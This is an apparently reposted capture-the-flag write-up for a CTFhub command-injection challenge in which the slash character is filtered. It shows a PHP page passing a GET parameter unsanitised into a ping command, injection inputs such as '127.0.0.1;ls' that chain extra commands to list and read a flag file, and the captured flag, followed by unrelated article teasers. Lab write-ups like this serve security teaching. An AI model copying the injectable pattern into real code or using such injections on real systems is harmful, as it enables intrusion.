CTFhub-RCE-过滤目录分隔符 /

CTFhub-RCE-过滤目录分隔符 /

news/2024/11/25 18:16:24/文章来源:https://blog.csdn.net/ssss39/article/details/134436298

根据源代码信息可知，过滤掉了/

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/\//", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

1. 查看当前目录 127.00.1;ls

2.

127.0.0.1;cd flag_is_here;ls;cat flag_21082715328454.php

ctfhub{32fc4a6e5efacbcfc917e014}

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/147819.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

【开源】基于Vue.js的高校实验室管理系统的设计和实现

【开源】基于Vue.js的高校实验室管理系统的设计和实现

项目编号： S 015 ，文末获取源码。 \color{red}{项目编号：S015，文末获取源码。} 项目编号：S015，文末获取源码。目录一、摘要1.1 项目介绍1.2 项目录屏二、研究内容2.1 实验室类型模块2.2 实验室模块2.3 实…

阅读更多...

数据结构与集合源码

数据结构与集合源码

我是南城余！阿里云开发者平台专家博士证书获得者！ 欢迎关注我的博客！一同成长！ 一名从事运维开发的worker，记录分享学习。专注于AI，运维开发，windows Linux 系统领域的分享！ 本…

阅读更多...

【数据结构与算法】线性表 - 顺序表

【数据结构与算法】线性表 - 顺序表

目录 1. 线性表2.顺序表3.顺序表的优缺点4.实现（C语言）4.1 头文件 seqList.h4.2 实现 seqList.c 1. 线性表线性表（linear list）是n个具有相同特性的数据元素的有限序列。线性表是一种在实际中广泛使用的数据结构，常见…

阅读更多...

音视频转换软件Permute mac中文板特点介绍

音视频转换软件Permute mac中文板特点介绍

Permute mac是一款Mac平台上的媒体格式转换软件，由Chaotic Software开发。它可以帮助用户快速地将各种音频、视频和图像文件转换成所需格式，并提供了一些常用工具以便于用户进行编辑和处理。 Permute mac软件特点 - 支持大量格式：支持几乎所…

阅读更多...

汇编-指针

汇编-指针

一个变量如果包含的是另一个变量的地址， 则该变量就称为指针(pointer) 。指针是操作数组和数据结构的极好工具，因为它包含的地址在运行时是可以修改的。 .data arrayB byte 10h, 20h, 30h, 40h ptrB dword arrayB ptrB1 dword OFFSET arrayBarray…

阅读更多...

Linux：权限篇 (彻底理清权限逻辑！)

Linux：权限篇 (彻底理清权限逻辑！)

shell命令以及运行原理： Linux严格意义上说的是一个操作系统，我们称之为“核心（kernel）“ ，但我们一般用户，不能直接使用kernel。而是通过kernel的“外壳”程序，也就是所谓的shell，来…

阅读更多...

YOLOV5部署Android Studio安卓平台NCNN

YOLOV5部署Android Studio安卓平台NCNN

坑非常多，兄弟们，我已经踩了三天的坑了，我这里部署了官方的yolov5s和我自己训练的yolov5n的模型下载Android Studio，配置安卓开发环境，这个过程比较漫长。安装cmake，注意安装的是cmake3.10版本。根据手机…

阅读更多...

LeetCode——字符串（Java）

LeetCode——字符串（Java）

字符串简介[简单] 344. 反转字符串[简单] 541. 反转字符串 II[中等] 151. 反转字符串中的单词简介记录一下自己刷题的历程以及代码。写题过程中参考了代码随想录。会附上一些个人的思路，如果有错误，可以在评论区提醒一下。 [简单] 344. 反转字符串…

阅读更多...

【IPC】消息队列

【IPC】消息队列

1、IPC对象除了最原始的进程间通信方式信号、无名管道和有名管道外，还有三种进程间通信方式，这三种方式称之为IPC对象 IPC对象分类：消息队列、共享内存、信号量(信号灯集) IPC对象也是在内核空间开辟区域，每一种IPC对象创建好…

阅读更多...

15分钟，不，用模板做数据可视化只需5分钟

15分钟，不，用模板做数据可视化只需5分钟

测试显示，一个对奥威BI软件不太熟悉的人来开发数据可视化报表，要15分钟，而当这个人去套用数据可视化模板做报表，只需5分钟！ 数据可视化模板是奥威BI上的一个特色功能板块。用户下载后更新数据源，立即就能获…

阅读更多...

windows安装wsl2以及ubuntu

windows安装wsl2以及ubuntu

查看自己系统的版本必须运行 Windows 10 版本 2004 及更高版本（内部版本 19041 及更高版本）或 Windows 11 才能使用以下命令在设置，系统里面就能看到开启windows功能直接winQ搜开启hyber-V、使用于Linux的Windows子系统、虚拟机平…

阅读更多...

群晖7.2版本安装CloudDriver2（套件）挂载alist（xiaoya）到本地

群晖7.2版本安装CloudDriver2（套件）挂载alist（xiaoya）到本地

CloudDrive是一个强大的多云盘管理工具，为用户提供包含云盘本地挂载的一站式的多云盘解决方案。挂载到本地后，可以像本地文件一样进行操作。一、套件库添加矿神源二、安装CloudDriver2 1、搜索安装搜索框输入【clouddrive】，搜索到Clou…

阅读更多...

获取文章分类详情

获取文章分类详情

CategoryController GetMapping("/detail")public Result<Category> detail(Integer id){Category c categoryService.findById(id);return Result.success(c);} CategoryService //根据id查询分类信息Category findById(Integer id); CategoryServiceImpl …

阅读更多...

山西电力市场日前价格预测【2023-11-20】

山西电力市场日前价格预测【2023-11-20】

日前价格预测预测说明： 如上图所示，预测明日（2023-11-20）山西电力市场全天平均日前电价为255.39元/MWh。其中，最高日前电价为436.50元/MWh，预计出现在18:00。最低日前电价为21.61元/MWh，预计出…

阅读更多...

【DevOps】Git 图文详解（三）：常用的 Git GUI

【DevOps】Git 图文详解（三）：常用的 Git GUI

Git 图文详解（三）：常用的 Git GUI 1.SourceTree2.TortoiseGit3.VSCode 中的 Git 如果不想用命令行工具，完全可以安装一个 Git 的 GUI 工具，用的更简单、更舒服。不用记那么多命令了，极易上手，不…

阅读更多...

Rocket如何实现顺序消费

Rocket如何实现顺序消费

RocketMQ 支持两种消息模式集群消费（ Clustering ）和广播消费（ Broadcasting ）。集群消费：同一 Topic 下的一条消息只会被同一消费组中的一个消费者消费。也就是说，消息被负载均衡到了同一个消费组的多…

阅读更多...

OpenCV技术应用（4）— 如何改变图像的透明度

OpenCV技术应用（4）— 如何改变图像的透明度

前言：Hello大家好，我是小哥谈。本节课就手把手教你如何改变图像的透明度，希望大家学习之后能够有所收获~！🌈 目录 🚀1.技术介绍 🚀2.实现代码 🚀1.技术介绍改变图像透明度的实…

阅读更多...

flink中配置Rockdb的重要配置项

flink中配置Rockdb的重要配置项

背景由于我们在flink中使用了状态比较大，无法完全把状态数据存放到tm的堆内存中，所以我们选择了把状态存放到rockdb上，也就是使用rockdb作为状态后端存储,本文就是简单记录下使用rockdb状态后端存储的几个重要的配置项使用rockdb状态后端…

阅读更多...

LangChain 代理 Agent(学习笔记)

LangChain 代理 Agent(学习笔记)

原文：LangChain 代理 Agent(学习笔记) - 尘叶心繁的专栏 - TNBLOG LangChain 代理 Agent(学习笔记) LangChain 代理 Agent(学习笔记) 简介Agent Zero-shot ReActStructured Input ReActOpenAI FunctionsConversationalSelf ask with searchReAct document storePlan…

阅读更多...

cesium雷达扫描（模糊圆效果）

cesium雷达扫描（模糊圆效果）

cesium雷达扫描（模糊圆效果） 1、实现思路使用ellipse方法加载圆型，修改ellipse中‘material’方法重写自己的glsl来实现当前效果 1、示例源码 index.html <!DOCTYPE html> <html lang="en"><head><!<

阅读更多...

推荐文章

最新文章